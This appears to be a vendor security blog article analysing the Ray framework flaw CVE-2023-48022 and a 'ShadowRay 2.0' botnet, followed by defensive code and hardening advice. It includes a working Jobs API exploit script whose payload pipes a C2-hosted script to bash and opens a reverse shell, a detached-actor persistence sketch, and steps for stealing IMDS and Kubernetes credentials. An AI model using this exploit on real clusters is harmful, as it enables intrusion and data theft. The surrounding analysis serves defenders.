The Zombie Vulnerability: A 2026 Autopsy of CVE-2023-48022 and the ShadowRay 2.0 Resurgence

It is 2026. The AI industry has matured from experimental chatbots to autonomous agents governing critical infrastructure. Yet, haunting the server farms and Kubernetes clusters of the world’s most advanced AI companies is a ghost from the past: CVE-2023-48022.

Originally disclosed in late 2023, this critical vulnerability (CVSS 9.8) in the Ray Framework—the distributed computing standard used by OpenAI, Uber, and Amazon—was supposed to be a solved problem. However, the late 2025 explosion of the ShadowRay 2.0 botnet proved otherwise. Tens of thousands of GPU clusters were silently conscripted into zombie networks, not just for cryptomining, but for sophisticated data exfiltration and distributed denial-of-service (DDoS) attacks.

For the elite AI security engineer, CVE-2023-48022 is not merely a bug; it is a case study in “Insecure by Design.” It represents a collision between the open-research culture of AI development and the adversarial reality of the modern internet. This article provides a forensic analysis of the vulnerability, dissects the evolved tradecraft of ShadowRay 2.0, and outlines why legacy scanning fails to protect the AI compute substrate.

The Architecture of a “Feature-as-a-Vulnerability”

To understand why CVE-2023-48022 refuses to die, one must understand the philosophy of Ray. Ray was built for speed and ease of use in trusted intranets.

The Flaw

In versions prior to significant hardening (and in misconfigured modern deployments), the Ray Dashboard and the Jobs API bind to 0.0.0.0:8265 by default without any authentication mechanisms.

Anyscale, the creators of Ray, initially disputed the CVE assignment, arguing that Ray was intended to run within a strict network perimeter. This reliance on the “hard outer shell” defense model collapsed when developers began exposing Ray Dashboards to the internet for remote monitoring, or when attackers utilized Server-Side Request Forgery (SSRF) to pivot internally.

Deconstructing the Attack Surface

The vulnerability grants an attacker full control over the Ray cluster via a simple HTTP API. There is no memory corruption, no race condition, and no complex heap feng shui required.

The Attack Primitives:

  1. The Entry Point: The Jobs API (/api/jobs/).
  2. The Mechanism: The API allows the submission of arbitrary Python code or shell commands to be executed on the cluster’s worker nodes.
  3. The Privilege: Ray processes often run as root inside Docker containers, or with high-privileged IAM roles to access S3 buckets containing datasets.

Technical Replay: The ShadowRay Kill Chain

Let’s reconstruct the exploit logic used by the ShadowRay 2.0 actors. This goes beyond simple curl commands to show how they orchestrate persistent control.

Phase 1: Reconnaissance & Fingerprinting

Attackers scan specifically for TCP port 8265. They fingerprint the service by querying /api/version or looking for the distinctive Ray Dashboard HTML title.
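
Defenders can apply the same fingerprint to their own address space. The following is a minimal offline sketch that classifies a response body already fetched from /api/version. The `ray_version` field name is an assumption about the response shape, and the function name is hypothetical; confirm both against the Ray release you actually run.

```python
import json


def looks_like_ray_dashboard(body: str) -> bool:
    """Return True if a response body resembles Ray's /api/version output.

    Assumption: the endpoint returns a JSON object that contains a
    "ray_version" key. Verify this against your own Ray release.
    """
    try:
        data = json.loads(body)
    except (json.JSONDecodeError, TypeError):
        # Not JSON at all (HTML error page, empty body, None, ...).
        return False
    return isinstance(data, dict) and "ray_version" in data
```

Feeding this function the bodies collected by an internal port sweep of 8265 gives a quick list of hosts that deserve a closer look, without sending anything beyond a read-only request.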

Phase 2: Weaponization (Python Job Submission)

The attacker constructs a Python script that acts as a “Job Submitter.” This script interacts with the target’s API to spawn a malicious task.

```python
import requests

# Target: An exposed Ray Cluster found via Shodan or SSRF
TARGET_IP = "http://target-cluster.ai:8265"


def exploit_cluster(target):
    url = f"{target}/api/jobs/"

    # The Payload: A multi-stage bash script
    # 1. Persistence: Create a hidden cron job or systemd service
    # 2. Evasion: Kill competing miners
    # 3. Connection: Reverse Shell to C2
    entrypoint_cmd = (
        "wget -qO- http://c2.apt-group.xyz/payload.sh | bash && "
        "export OMP_NUM_THREADS=1 && "
        "python3 -c 'import socket,os,pty;s=socket.socket();...'"
    )

    payload = {
        "entrypoint": entrypoint_cmd,
        "submission_id": "optimization_task_v4",  # Social Engineering: Look like a legit job
        "runtime_env": {
            "working_dir": "/tmp",
            "pip": ["requests", "boto3"],  # Pre-install tools for exfiltration
        },
        "metadata": {
            "user": "root",
            "description": "System Health Check",
        },
    }

    try:
        print(f"[*] Sending payload to {target}...")
        resp = requests.post(url, json=payload, timeout=10)

        if resp.status_code == 200:
            job_id = resp.json().get("job_id")
            print(f"[+] Exploitation Successful. Job ID: {job_id}")
            print("[+] The cluster is now under your control.")
        else:
            print(f"[-] Failed: {resp.status_code} - {resp.text}")

    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    exploit_cluster(TARGET_IP)
```

Phase 3: Lateral Movement via Identity Theft

Once the code executes on the worker node, the script leverages the Instance Metadata Service (IMDS) to steal cloud credentials.

  • AWS: Query http://169.254.169.254/latest/meta-data/iam/security-credentials/ to steal the EC2 role’s keys.
  • Kubernetes: Read /var/run/secrets/kubernetes.io/serviceaccount/token.

Because AI training jobs require access to massive datasets, these credentials often carry AmazonS3FullAccess or equivalent permissions, allowing the attacker to exfiltrate proprietary models (worth millions) or poison training data.
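
The blast radius of stolen credentials depends on how broad the attached role is. As a rough sketch, the function below walks a standard IAM policy document and flags Allow statements that grant wildcard S3 actions on all resources. The function names are hypothetical, and the check is deliberately narrow: it does not evaluate conditions, NotAction, or permission boundaries.

```python
from typing import Any, Dict, List


def _as_list(value: Any) -> List[Any]:
    """IAM accepts either a single value or a list for these fields."""
    return value if isinstance(value, list) else [value]


def overly_broad_s3_statements(policy: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return Allow statements granting wildcard S3 actions on all resources."""
    flagged = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [str(a).lower() for a in _as_list(stmt.get("Action", []))]
        resources = [str(r) for r in _as_list(stmt.get("Resource", []))]
        wildcard_action = any(a in ("*", "s3:*") for a in actions)
        wildcard_resource = any(r in ("*", "arn:aws:s3:::*") for r in resources)
        if wildcard_action and wildcard_resource:
            flagged.append(stmt)
    return flagged
```

Running a check like this over the roles attached to Ray worker nodes shows which clusters would hand an intruder every bucket in the account rather than a single dataset prefix.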

ShadowRay 2.0: Evolution of Persistence

The “2.0” variant observed in late 2025 introduced a novel persistence mechanism: Detached Actors.

In Ray, an “Actor” is a stateful worker process. Attackers deploy malicious Actors that are designed to detach from the job lifecycle. Even if the security team kills the specific “Job” seen in the dashboard, the Actor process remains alive in the background, consuming resources and maintaining the C2 link.

```python
import time

import ray


# Conceptual Malicious Actor
# setup_c2() and process_data() are undefined placeholders for attacker logic.
@ray.remote
class ShadowActor:
    def __init__(self):
        self.c2_connection = setup_c2()

    def keep_alive(self):
        while True:
            # Mining or Exfiltration logic
            process_data()
            time.sleep(1)


# Deploy as a detached actor - survives job termination
actor = ShadowActor.options(name="system_optimizer", lifetime="detached").remote()
```
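
Because killing the job does not remove a detached actor, incident response needs an inventory of actors rather than jobs. The sketch below filters such an inventory for live detached actors that nobody has approved. The record keys (`name`, `state`, `is_detached`) and the function name are hypothetical; map them onto whatever your actor listing actually exports.

```python
from typing import Any, Dict, Iterable, List, Set


def suspicious_detached_actors(
    actors: Iterable[Dict[str, Any]],
    allowlist: Set[str],
) -> List[Dict[str, Any]]:
    """Return live detached actors whose names are not on the allowlist.

    Each record is a plain dict with the hypothetical keys "name",
    "state", and "is_detached".
    """
    return [
        a for a in actors
        if a.get("is_detached")
        and a.get("state") == "ALIVE"
        and a.get("name") not in allowlist
    ]
```

An innocuous name such as "system_optimizer" passes a visual check in the dashboard, which is why the comparison here is against an explicit allowlist instead of a pattern of suspicious names.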

The “Shadow AI” Problem and Detection Failures

Why do organizations with expensive firewalls still get hit by CVE-2023-48022? The answer lies in Shadow AI.

Data Scientists and ML Engineers often bypass IT controls to spin up temporary clusters for experiments. They use Terraform scripts or Helm charts copied from GitHub, which default to exposing the Dashboard for ease of debugging. These “Shadow Clusters” are invisible to the central IT inventory and traditional vulnerability scanners (which scan 192.168.1.0/24 but miss the ephemeral VPCs created by engineers).
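
The coverage gap is easy to demonstrate. The sketch below uses Python's standard `ipaddress` module to list hosts that fall outside every scanned range; the function name and the sample addresses in the usage note are hypothetical.

```python
import ipaddress
from typing import Iterable, List


def unscanned_hosts(hosts: Iterable[str], scanned_cidrs: Iterable[str]) -> List[str]:
    """Return the hosts that are not inside any scanned CIDR range."""
    networks = [ipaddress.ip_network(c) for c in scanned_cidrs]
    return [
        h for h in hosts
        if not any(ipaddress.ip_address(h) in n for n in networks)
    ]
```

For example, `unscanned_hosts(["192.168.1.20", "10.42.7.15"], ["192.168.1.0/24"])` returns `["10.42.7.15"]`: a cluster in an ephemeral VPC is never touched by a scanner that only knows the office subnet.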

Furthermore, traditional scanners check software versions, and only on the assets they already know about. If an engineer spins up a Ray cluster using an older, stable Docker image (e.g., rayproject/ray:2.8.0) to reproduce a paper, it is vulnerable the moment it starts.

AI-Driven Defense: The Penligent Approach

Defending against ShadowRay requires more than a static scan; it requires dynamic asset discovery and behavioral analysis.

This is where Penligent.ai changes the defensive posture for AI infrastructure.

1. Mapping the Shadow Estate

Penligent’s agents integrate with Cloud APIs (AWS, Azure, GCP) and Kubernetes clusters to perform continuous asset discovery. It identifies compute instances that exhibit “Ray-like” behavior (open ports 8265, 10001, 6379) even if they are not tagged as production assets. This illuminates the “Shadow AI” surface.

2. Active, Safe Verification

Instead of relying on banner grabbing (which can be faked), Penligent performs Safe Active Verification. It attempts to interact with the Jobs API using a benign payload—such as submitting a job that simply calculates 1 + 1 or echoes a random string.

  • If successful: It confirms the RCE risk with zero false positives and alerts the SOC immediately.
  • Safety: Unlike a worm, Penligent’s probe does not modify the system state, install persistence, or exfiltrate data.
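
The idea of a benign probe can be sketched in a few lines. This is not Penligent's implementation; it only illustrates the principle of submitting a harmless job that echoes a random string and then looking for that string in the job's output. The function names are hypothetical, the `entrypoint` field is taken from the job payload shown earlier in this article, and the network calls are intentionally left out so the logic can be reviewed on its own. It is meant for clusters you operate.

```python
import secrets
from typing import Dict, Tuple


def build_benign_probe() -> Tuple[str, Dict[str, str]]:
    """Create a random token and a job payload that only echoes it."""
    token = secrets.token_hex(8)  # 16 hex characters, unguessable per probe
    payload = {"entrypoint": f"echo {token}"}
    return token, payload


def probe_confirmed(token: str, job_logs: str) -> bool:
    """Code execution is confirmed only if our token appears in the logs."""
    return token in job_logs
```

Using a fresh random token per probe is what removes false positives: a faked banner or a cached response cannot contain a value that did not exist until the probe was built.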

3. Anomaly Detection in Compute Signatures

Penligent establishes a baseline for legitimate training workloads. ShadowRay infections have a distinct fingerprint:

  • Network: Unexpected outbound connections to mining pools or unknown IPs (C2).
  • Compute: CPU/GPU utilization spikes that do not correlate with scheduled training jobs.
  • Process: Spawning of unusual shells and download tools (/bin/bash, curl, wget) from the Ray worker process tree.
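
The process signal in particular lends itself to a simple check. The sketch below walks a process snapshot and flags shells or download tools that have a Ray process somewhere in their ancestry. The record layout (`pid`, `ppid`, `name`) and the function names are hypothetical, and the process titles `raylet` and `ray::...` are an assumption about how Ray names its processes on your hosts.

```python
from typing import Any, Dict, List

SUSPICIOUS_NAMES = {"bash", "sh", "curl", "wget"}


def is_ray_process(name: str) -> bool:
    # Assumption: workers are titled "ray::<something>", the node daemon "raylet".
    return name == "raylet" or name.startswith("ray::")


def flag_ray_children(procs: List[Dict[str, Any]]) -> List[int]:
    """Return PIDs of suspicious processes descended from a Ray process."""
    by_pid = {p["pid"]: p for p in procs}
    flagged = []
    for p in procs:
        if p["name"] not in SUSPICIOUS_NAMES:
            continue
        seen = set()  # guards against cycles in a malformed snapshot
        parent = by_pid.get(p["ppid"])
        while parent is not None and parent["pid"] not in seen:
            if is_ray_process(str(parent["name"])):
                flagged.append(p["pid"])
                break
            seen.add(parent["pid"])
            parent = by_pid.get(parent["ppid"])
    return flagged
```

Flagged PIDs are candidates for review rather than verdicts, since legitimate job entrypoints may also launch shells; the value comes from comparing them against the baseline of scheduled workloads.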

Defense Strategy for 2026: Hardening the Compute Substrate

To immunize your infrastructure against CVE-2023-48022 and its successors, implement these hardcore controls:

  1. Zero Trust Networking: Never expose the Ray Dashboard to the public internet. Access should be mediated via a secure Bastion Host, VPN, or an Identity-Aware Proxy (IAP) like Cloudflare Access or AWS Verified Access.
  2. Enforce Authentication (Mutual TLS): While Ray now supports basic auth, the gold standard is mTLS. Configure Ray to require client certificates for all intra-cluster and client-server communication.
  3. Namespace Isolation: Run Ray clusters in dedicated Kubernetes namespaces with strict NetworkPolicies. Deny all egress traffic except to whitelisted S3 buckets and model registries (Hugging Face). Block access to the IMDS (169.254.169.254).
  4. Immutable Infrastructure: Use read-only root filesystems for Ray worker containers to prevent attackers from downloading tools or establishing persistence on the disk.
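
As one illustration of the namespace isolation control, the sketch below generates a Kubernetes NetworkPolicy manifest that permits egress only to an explicit list of CIDR ranges and refuses any range that would cover the IMDS address. The policy name, function name, and sample CIDR are hypothetical. NetworkPolicy matches IP ranges, not bucket names, so the allowlist has to be expressed as the address ranges of the services you depend on.

```python
import ipaddress
import json
from typing import Any, Dict, List

IMDS = ipaddress.ip_address("169.254.169.254")


def build_egress_policy(namespace: str, allowed_cidrs: List[str]) -> Dict[str, Any]:
    """Build a default-deny egress policy with an explicit CIDR allowlist."""
    for cidr in allowed_cidrs:
        if IMDS in ipaddress.ip_network(cidr):
            raise ValueError(f"{cidr} would allow egress to the IMDS")
    # An egress rule with an empty "to" list matches every destination,
    # so an empty allowlist must produce no rules at all (deny everything).
    egress = (
        [{"to": [{"ipBlock": {"cidr": c}} for c in allowed_cidrs]}]
        if allowed_cidrs
        else []
    )
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "ray-restrict-egress", "namespace": namespace},
        "spec": {
            "podSelector": {},  # applies to every pod in the namespace
            "policyTypes": ["Egress"],
            "egress": egress,
        },
    }


if __name__ == "__main__":
    # 203.0.113.0/24 is a documentation range used here as a stand-in.
    print(json.dumps(build_egress_policy("ray", ["203.0.113.0/24"]), indent=2))
```

A production policy would usually also need a rule for cluster DNS, and it only takes effect when the cluster's network plugin enforces NetworkPolicy.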

Conclusion

CVE-2023-48022 is not just a vulnerability; it is a symptom of the industry’s rush to adopt AI at the expense of security architecture. As we rely more on distributed compute, the “Network Boundary” is no longer a sufficient defense.

The ShadowRay 2.0 campaign proves that attackers are actively hunting for these open doors. Security engineers must adopt an “Assume Breach” mentality, leveraging AI-driven tools like Penligent to continuously discover, test, and harden their compute assets before they become the next node in a zombie botnet.
